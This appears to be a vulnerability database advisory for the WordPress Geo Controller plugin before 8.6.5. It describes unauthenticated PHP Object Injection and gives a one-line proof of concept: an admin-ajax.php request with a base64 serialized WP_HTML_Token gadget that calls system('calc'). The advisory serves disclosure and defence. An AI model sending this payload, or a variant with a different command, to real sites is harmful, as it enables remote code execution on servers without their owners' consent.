WordPress Plugin Vulnerabilities
WordPress Geo Controller < 8.6.5 - PHP Object Injection
Description
The plugin unserializes user input via some of its AJAX actions and REST API routes, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.
Proof of Concept
/wp-admin/admin-ajax.php?action=cf_geoplugin_shortcode_cache&options=TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OiJjYWxjIjtzOjEwOiJvbl9kZXN0cm95IjtzOjY6InN5c3RlbSI7fQ==
Affects Plugins
References
Classification
Type
OBJECT INJECTION
OWASP top 10
CWE
Miscellaneous
Original Researcher
fuyoumingyan
Submitter
fuyoumingyan
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-04-10 (about 1 months ago)
Added
2024-04-10 (about 1 months ago)
Last Updated
2024-04-10 (about 1 months ago)